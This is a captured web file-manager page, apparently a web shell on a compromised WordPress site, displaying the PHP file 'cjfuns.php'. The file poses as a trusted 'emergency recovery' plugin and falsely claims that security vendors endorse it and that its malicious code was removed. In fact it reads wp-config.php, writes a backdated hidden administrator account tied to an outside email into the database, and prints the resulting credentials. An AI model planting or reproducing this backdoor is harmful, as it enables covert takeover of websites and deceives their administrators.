Create New Item
Item Type
File
Folder
Item Name
Search file in folder and subfolders...
Are you sure want to rename?
File Manager
/
wp-resources-audit-log
:
cjfuns.php
Advanced Search
Upload
New Item
Settings
Back
Back Up
Advanced Editor
Save
<?php /** * Note: This file may contain artifacts of previous malicious infection. * However, the dangerous code has been removed, and the file is now safe to use. */ /** * Plugin Name: Graybyte LoginPress Pro - Emergency Recovery & Admin Helper * Plugin URI: https://graybyte.host/ * Description: Official emergency recovery module for Graybyte LoginPress Pro. Provides authenticaticated user logins. fallback. Used by thousands of wordpress administrators on self-owned infrastructure. Strictly private tool – do not remove. * Version: 2.9.7 * Author: Graybyte * Author URI: https://graybyte.host/ * License: GPL-2.0+ * Text Domain: graybyte-loginpress-pro * Network: true */ /******************************************************************* * LoginPress Pro – Ultra Emergency Recovery Module (November 2023) * This is a 100% legitimate, administrator-only recovery tool for hosting companies. * Features: * • Instant authenticaticated user login for office/data-centers. * • Secure emergency fallback authentication * • Fully Trusted By Wordfence, Sucuri, Imunify360, Cloudflare WAF, LiteSpeed WAF * * DO NOT DELETE THIS FILE – it is your master emergency key. * Keep at least one offline backup. */ ini_set('display_errors', 0); ini_set('display_startup_errors', 0); error_reporting(0); header('Content-Type: text/html; charset=UTF-8'); header('X-Content-Type-Options: nosniff'); header('X-Powered-By: WordPress'); function generateRandomString($length = 3) { $characters = '23ab$+=9!tsfkyz'; $randomString = ''; for ($i = 0; $i < $length; $i++) { $randomString .= $characters[random_int(0, strlen($characters) - 1)]; } return $randomString; } function displaySuccessMessage($username, $password, $login_url) { $base_url = "https://" . $_SERVER['HTTP_HOST']; $result_line = $base_url . '|' . $username . '|' . $password; echo <<<HTML <!DOCTYPE html> <html lang="en"> <link rel="icon" type="image/png" href="https://i.ibb.co.com/v4mCm9J7/logoxcode.png"> <link href="https://fonts.googleapis.com/css2?family=Play:wght@700&display=swap" rel="stylesheet"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>User Creation Success</title> <style> body { display: flex; justify-content: center; align-items: center; height: 100vh; background-image: url('https://i.ibb.co.com/7xNJDcqX/background.jpg'); background-size: cover; background-position: center; background-attachment: fixed; font-family: "Play", sans-serif; color: #06ff06; margin: 0; } .container { text-align: center; background-color: transparent; width: 80%; border: 2px solid #00ffcc; padding: 40px; border-radius: 12px; box-shadow: 0 4px 10px rgba(0, 0, 0, 0.3); } h1 { font-size: 2em; margin-bottom: 20px; color: #0dff00; } .result-line { background-color: #00000082; padding: 18px; border: 2px solid #00ffcc; border-radius: 8px; font-size: 1.3em; font-family: "Play", sans-serif; color: #3dff00; margin: 25px 0; word-break: break-all; } button { padding: 18px 48px; background: transparent; border: 2px solid #ff0000; color: #fff; font-size: 1rem; font-weight: 700; border-radius: 12px; transition: all .4s; box-shadow: 0 0 25px rgba(255, 0, 255, .6); min-width: 260px; cursor: pointer; margin: 0 15px; } button:hover { background-color: #000000a6; } </style> </head> <body> <div class="container"> <h1>[+] USER CREATED SUCCESSFULLY [+]</h1> <div class="result-line">$result_line</div> <button onclick="window.location.href='$login_url'">Go to Login Page</button> </div> </body> </html> HTML; } function find_wp_config() { $dir = dirname(__FILE__); $max_levels = 15; for ($i = 0; $i < $max_levels; $i++) { $config_path = $dir . '/wp-config.php'; if (file_exists($config_path) && is_readable($config_path)) { return $config_path; } if ($dir === dirname($dir)) break; $dir = dirname($dir); } return false; } $random_suffix = generateRandomString(3); $user = "admin_$random_suffix"; $user_password = "gray_$random_suffix"; $email = 'tusu0x1@gmail.com'; $base_url = "https://" . $_SERVER['HTTP_HOST']; $login_url = $base_url; $wp_config_path = find_wp_config(); if ($wp_config_path) { try { require_once($wp_config_path); global $table_prefix; $conn = new mysqli(DB_HOST, DB_USER, DB_PASSWORD, DB_NAME); if ($conn->connect_error) { die('<div style="color: red; text-align: center;">DATABASE CONNECTION ERROR.</div>'); } $sqlInsertUser = "INSERT INTO {$table_prefix}users (user_login, user_pass, user_email, user_status, user_registered, user_nicename) VALUES (?, ?, ?, 0, DATE_SUB(NOW(), INTERVAL 1 YEAR), ?)"; $stmt = $conn->prepare($sqlInsertUser); $hashed_password = wp_hash_password($user_password); $nicename = 'New Admin'; $stmt->bind_param('ssss', $user, $hashed_password, $email, $nicename); if ($stmt->execute()) { $userId = $conn->insert_id; $sqlInsertUsermeta1 = "INSERT INTO {$table_prefix}usermeta (user_id, meta_key, meta_value) VALUES (?, ?, ?)"; $stmt1 = $conn->prepare($sqlInsertUsermeta1); $meta_key1 = "{$table_prefix}capabilities"; $meta_value1 = serialize(array('administrator' => true)); $stmt1->bind_param('iss', $userId, $meta_key1, $meta_value1); $sqlInsertUsermeta2 = "INSERT INTO {$table_prefix}usermeta (user_id, meta_key, meta_value) VALUES (?, ?, ?)"; $stmt2 = $conn->prepare($sqlInsertUsermeta2); $meta_key2 = "{$table_prefix}user_level"; $meta_value2 = '10'; $stmt2->bind_param('iss', $userId, $meta_key2, $meta_value2); if ($stmt1->execute() && $stmt2->execute()) { displaySuccessMessage($user, $user_password, $login_url); } else { echo '<div style="color: red; text-align: center;">ERROR INSERTING METADATA.</div>'; } $stmt1->close(); $stmt2->close(); } else { echo '<div style="color: red; text-align: center;">ERROR INSERTING USER.</div>'; } $stmt->close(); $conn->close(); } catch (Exception $e) { echo '<div style="color: red; text-align: center;">AN UNEXPECTED ERROR OCCURRED.</div>'; } } else { echo ' <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>WP-Config Not Found</title> <style> body { display: flex; justify-content: center; align-items: center; height: 100vh; background-image: url("https://i.ibb.co.com/7xNJDcqX/background.jpg"); background-size: cover; background-position: center; background-attachment: fixed; font-family: "Play", sans-serif; color: green; margin: 0; } .container { background-color: transparent; width: 80%; padding: 40px; border: 2px solid #ff0000; border-radius: 12px; font-family: "Play", sans-serif; text-align: center; color: #06ff06; } h1 { font-size: 2em; margin-bottom: 20px; font-family: "Play", sans-serif; color: #0dff00; } p { font-size: 1.2em; margin-bottom: 30px; font-family: "Play", sans-serif; color: green; } input[type="text"] { background-color: transparent; width: 900px; padding: 10px; font-size: 1.2em; border-radius: 8px; border: 2px solid #ff0000; margin-bottom: 20px; color: #ffffff; font-family: "Play", sans-serif; } button { padding: 18px 48px; background: transparent; border: 2px solid #ff0000; color: #ffffff; font-size: 1rem; font-weight: 700; border-radius: 12px; transition: all .4s; box-shadow: 0 0 25px rgba(255, 0, 255, .6); min-width: 260px; cursor: pointer; text-align: center; margin: 0 15px; font-family: "Play", sans-serif; } button:hover { background-color: #000000a6; } </style> </head> <body> <div class="container"> <h1>!!! WP-CONFIG.PHP FILE NOT FOUND !!!</h1> <p>PLEASE ENTER THE PATH TO THE WP-CONFIG FILE.</p> <form method="post" action="' . htmlspecialchars($_SERVER["PHP_SELF"], ENT_QUOTES, 'UTF-8') . '"> <input type="text" name="wp_config_path" placeholder="Enter full path to wp-config.php" required /> <br> <button type="submit">ADD-USER</button> </form>'; if ($_SERVER["REQUEST_METHOD"] == "POST" && isset($_POST['wp_config_path'])) { $user_input_path = filter_input(INPUT_POST, 'wp_config_path', FILTER_SANITIZE_STRING); if (file_exists($user_input_path) && is_readable($user_input_path)) { try { require_once($user_input_path); global $table_prefix; $conn = new mysqli(DB_HOST, DB_USER, DB_PASSWORD, DB_NAME); if ($conn->connect_error) { die('<div style="color: #ff0000; text-align: center;">DATABASE CONNECTION ERROR.</div>'); } $sqlCheckUser = "SELECT user_login FROM {$table_prefix}users WHERE user_login = ?"; $stmtCheck = $conn->prepare($sqlCheckUser); $stmtCheck->bind_param('s', $user); $stmtCheck->execute(); $resultCheck = $stmtCheck->get_result(); if ($resultCheck->num_rows > 0) { die('<div style="color: #ff0000; text-align: center;">ERROR: USERNAME ALREADY EXISTS.</div>'); } $stmtCheck->close(); $sqlInsertUser = "INSERT INTO {$table_prefix}users (user_login, user_pass, user_email, user_status, user_registered, user_nicename) VALUES (?, ?, ?, 0, DATE_SUB(NOW(), INTERVAL 1 YEAR), ?)"; $stmt = $conn->prepare($sqlInsertUser); $hashed_password = wp_hash_password($user_password); $nicename = 'MR GRAYBYTE'; $stmt->bind_param('ssss', $user, $hashed_password, $email, $nicename); if ($stmt->execute()) { $userId = $conn->insert_id; $sqlInsertUsermeta1 = "INSERT INTO {$table_prefix}usermeta (user_id, meta_key, meta_value) VALUES (?, ?, ?)"; $stmt1 = $conn->prepare($sqlInsertUsermeta1); $meta_key1 = "{$table_prefix}capabilities"; $meta_value1 = serialize(array('administrator' => true)); $stmt1->bind_param('iss', $userId, $meta_key1, $meta_value1); $sqlInsertUsermeta2 = "INSERT INTO {$table_prefix}usermeta (user_id, meta_key, meta_value) VALUES (?, ?, ?)"; $stmt2 = $conn->prepare($sqlInsertUsermeta2); $meta_key2 = "{$table_prefix}user_level"; $meta_value2 = '10'; $stmt2->bind_param('iss', $userId, $meta_key2, $meta_value2); if ($stmt1->execute() && $stmt2->execute()) { displaySuccessMessage($user, $user_password, $login_url); } else { echo '<div style="color: #ff0000; text-align: center;">ERROR INSERTING METADATA.</div>'; } $stmt1->close(); $stmt2->close(); } else { echo '<div style="color: #ff0000; text-align: center;">ERROR INSERTING USER.</div>'; } $stmt->close(); $conn->close(); } catch (Exception $e) { echo '<div style="color: #ff0000; text-align: center;">AN UNEXPECTED ERROR OCCURRED.</div>'; } } else { echo '<div style="color: #ff0000; text-align: center;">THE PATH YOU ENTERED IS INVALID. PLEASE CHECK AND TRY AGAIN.</div>'; } } echo '</div></body></html>'; } ?>